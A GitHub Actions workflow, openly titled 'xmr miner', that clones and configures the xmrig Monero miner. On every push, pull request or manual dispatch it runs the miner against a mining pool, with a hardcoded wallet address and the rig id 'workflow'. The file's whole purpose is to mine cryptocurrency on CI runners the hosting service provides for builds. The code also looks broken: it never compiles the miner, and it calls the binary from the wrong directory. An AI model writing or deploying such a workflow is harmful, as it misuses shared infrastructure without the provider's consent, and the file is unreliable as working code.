name: xmr miner 🦹‍♂️

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v2

      - name: Installs xmrig
        run: |
          sudo apt update
          sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..

      - name: Runs xmrig
        run: |
          ./xmrig -o pool.minexmr.com:443 -u 46CwGD9Z8Qyh1WN8aMaiux7xx8NENXL1gFK2Nt2wqMDP9hQ8UeEJbZSAivuKzeRx5rQwbLPnLeJdsbva9LteRbe7ERi4YfD -k --tls --rig-id workflow
